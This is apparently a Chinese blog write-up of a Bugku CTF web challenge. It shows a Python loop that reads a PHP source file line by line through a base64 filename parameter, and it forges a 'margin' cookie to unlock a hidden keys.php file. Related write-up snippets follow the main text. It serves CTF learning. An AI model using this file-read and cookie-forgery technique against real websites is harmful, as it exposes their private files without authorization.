bugku cookies欺骗-wp

最新推荐文章于 2022-09-29 15:21:29 发布
最新推荐文章于 2022-09-29 15:21:29 发布
阅读量218 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/107346421
版权

在这里插入图片描述打开容器,发现一大串字符串,发现他们是循环的,研究了一会什么都没发现(事实的确是字符串本身没有什么意义)
在这里插入图片描述
上面有俩参数,解码一下是keys.txt,前面的line改0页面不变,改1发现页面改变。
把key.txt改成index.php,发现该前面的参数为1出现代码,改2有不同的代码,结合参数名猜测是通过参数控制显示不同的行,后面还有很多,写个脚本跑一下
在这里插入图片描述


import requests

url='http://123.206.87.240:8002/web11/index.php?line=2&filename=aW5kZXgucGhw'

for i in range(1,30):
    payload='http://123.206.87.240:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw'%(i)
    a=requests.get(url=payload)
    print(a.text)

源代码


<?error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

 

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

简单分析一下,当cookie里的参数margin='margin’时,会把keys.php加进数组,很明显这个数组是我们外面参数可操控查看的,抓包添加cookie
在这里插入图片描述line=0&filename=a2V5cy5waHA=

keys.php记得base64

冰可乐不加可乐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugKucookies 欺骗
wssmiss的博客
03-25 1518
题目链接 http://123.206.87.240:8002/web11/ 查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 333
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
bugkuctf cookies欺骗wp
wuerror的博客
08-05 787
     老实说这道题有点绕,也可能是我比较菜。点开题目链接发现URL是这样的:"http://120.24.86.145:8002/web11/index.php?line=&amp;filename=a2V5cy50eHQ="          然后对filename进行base64解码,发现是keys.txt,诶有点莫名其妙,看一看别人的wp,把keys.txt换成index.php的ba...
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
伪造cookies --bugku 23cookies欺骗
s11show_163的博客
11-28 716
首先抬头看url发现有点儿类似sql注入,结尾base64解码后发现是key.txt于是根据经验先试一试如果是index.php会怎么样,前面的line=显然也可以传参数进去,于是写一个脚本如下: import requests import base64 r = requests.session() for i in range(30): url="http://123.206.87.240...
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3337
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
Bugku-web之cookies
weixin_42939822的博客
03-13 1576
一打开题目,发现一系列重复的字符串,受到“备份是个好习惯”题目的影响,不自觉地对这串字符串进行了各种解密,无果…… 此时思路堵塞,无意间看到url中的payload格式,对filename变量进行了base64解码,得到了keys.txt的结果。 想到可能存在php常见的文件包含问题,于是对filename变量进行了更改,变更为index.php的base64加密,同时猜测line变量表示源码的行数,先另line=3,进行尝试,喜得猜想结果。 于是编写脚本,对index.php的源码进行提取。
bugku cookies
最新发布
weixin_63810302的博客
09-29 1078
bugku cookies
bugku cookies欺骗
qq_51439282的博客
02-03 270
打开题目可以看到一堆乱码毫无规律 之后发现网址中有一串base64编码a2V5cy50eHQ= 解码得到:keys.txt 再尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码) line应该是行数那么就从0开始试发现每增加一个数字都有所不同 这样一个一个试太麻烦,直接用脚本将源码跑出来 import requests a = 30 for i in range(a): url = "http://114.67.246.176:16736/i
bugku-cookies
m0_62094846的博客
10-27 1006
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
BugKu_cookies
Kobalos的博客
08-10 423
访问目标地址,发现了一串不知道在表达什么的字符串 看到url最后是一个base64加密了的字符串“a2V5cy50eHQ=”,尝试解码 尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=2 那么尝试把line改成3看看会发生什么呢 到这里可以猜测,每改一次行数就会显示一行源码! 我们尝试把line改成20的时候,发现是个空白页,不断减少范围,发现共有18行源代码! 构造脚本! 代码如下: im.
bugku web cookies欺骗
weixin_43928140的博客
05-20 728
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
Bugku——cookie欺骗
csu_vc的博客
10-28 8409
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
bugkucookies欺骗
Seaern的博客
08-02 632
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 310
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 654
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
WordPress wp-config.php配置详解:数据库、安全密钥与字符集
"这篇文档详细解释了WordPress的配置文件wp-config.php,涵盖了数据库连接设置、字符集与整理、以及安全密匙的配置等关键信息,旨在帮助用户更好地理解和定制WordPress站点。" 在WordPress中,`wp-config.php`是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值